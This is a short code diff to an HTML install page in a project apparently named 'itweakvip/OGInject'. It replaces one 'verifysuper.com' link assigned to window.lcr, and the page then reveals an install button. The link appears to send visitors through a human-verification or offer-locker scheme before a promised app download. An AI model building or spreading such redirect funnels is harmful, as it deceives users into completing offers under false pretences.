--- a/itweakvip/OGInject/videostar.html
+++ b/itweakvip/OGInject/videostar.html
@@ -125,7 +125,7 @@
         id("app_name").innerHTML = name;
         id("app-caption-title").innerHTML = name;
 
-        window.lcr = "https://www.verifysuper.com/cl.php?id=da95c2f5ba3df64ea4050231bb70795e";
+        window.lcr = "https://verifysuper.com/cl/i/klpd5q";
         id("install").style.display = "block";
     }
 
